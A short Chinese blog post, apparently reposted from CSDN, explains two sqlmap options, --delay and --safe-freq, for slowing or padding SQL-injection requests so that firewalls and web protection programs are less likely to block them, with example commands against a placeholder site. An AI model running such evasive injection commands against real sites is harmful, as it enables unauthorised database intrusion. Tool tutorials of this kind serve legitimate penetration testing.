请求延时(针对防火墙、web本身的保护程序等)

参数一:–delay 1(1秒) 表示延时1秒进行注入,1可根据自己情况更改

sqlmap.py -u “http://www.xx.com/index.php/index/view/id/40*.html” --delay 1(1是时间,1秒,自己设置)

例:
sqlmap.py -u “http://www.xx.com/index.php/index/view/id/40*.html” --delay 1

参数二:-safe-freq 提供一个安全不错误的连接,每次测试请求之后都会再访问一边安全连接。

sqlmap.py -u “http://www.xx.com/index.php/index/view/id/40*.html” -safe-freq 20(20为次数,自己设定)

例:
sqlmap.py -u “http://www.xx.com/index.php/index/view/id/40*.html” -safe-freq 3

发布了35 篇原创文章 · 获赞 2 · 访问量 711

猜你喜欢

转载自blog.csdn.net/qq_42452926/article/details/104719728